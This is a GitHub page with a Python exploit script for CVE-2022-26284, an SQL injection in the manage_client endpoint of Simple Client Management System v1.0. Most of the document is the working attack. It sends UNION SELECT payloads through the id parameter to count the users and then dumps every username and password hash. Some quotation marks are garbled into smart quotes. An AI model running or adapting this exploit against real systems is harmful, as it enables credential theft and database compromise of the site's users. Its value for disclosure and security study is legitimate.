Headline
CVE-2022-26284: SQLi-exploit---Simple-Client-Management-System/manage_client_sqli.py at main · Dir0x/SQLi-exploit---Simple-Client-Management-System
Simple Client Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in the manage_client endpoint. This vulnerability allows attackers to dump the application’s database via crafted HTTP requests.
Permalink
Cannot retrieve contributors at this time
#!/usr/bin/python3
# Exploit Title: SQLi in manage_client endpoint of Simple Client Management System
# Date: 06/11/2021
# Exploit Author: Daniel Haro
# Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
# Version: 1.0
# Tested on: debian 10, apache, mysql
from requests import get
from re import search
import argparse
args = argparse.ArgumentParser(description="Exploit to SQL injection in manage_client endpoint of Simple Client Management System CMS through id parameter")
args.add_argument('-t’, '–target’, help="URL of the victim. Example: http://localhost/")
args = args.parse_args()
print(“Simple Client Management System”)
print(“Error based SQL injection exploit”)
count_req = get(args.target + "/admin/?page=client/manage_client&id=’ union select count(*),null,null,null,null,null,null from users-- -")
n = search('<input type="hidden" name="id" value=".*’, count_req.text)
n = int(n.group(0).replace('<input type="hidden" name="id" value="’, ‘’).replace(“\">","”))
print(“±-----------------------------±-------------------------------+”)
print(“| username | hash |”)
print(“±-----------------------------±-------------------------------+”)
for i in range(1, n+1):
user = search(‘<input type="hidden" name="id" value=".*’, get(args.target + "/admin/?page=client/manage_client&id=’ union select username,null,null,null,null,null,null from users where id=" + str(i) + “–%20-").text).group(0).replace('<input type="hidden” name="id" value="’, ‘’).replace('">’,"").replace("\r", “”)
hash = search(‘<input type="hidden" name="id" value=".*’, get(args.target + "/admin/?page=client/manage_client&id=’ union select password,null,null,null,null,null,null from users where id=" + str(i) + “–%20-").text).group(0).replace('<input type="hidden” name="id" value="’, ‘’).replace('">’,"").replace("\r", “”)
user = “|” + user + (" "*(30-len(user))) + “|”
print(user + hash + “|”)
print(“±-----------------------------±-------------------------------+”)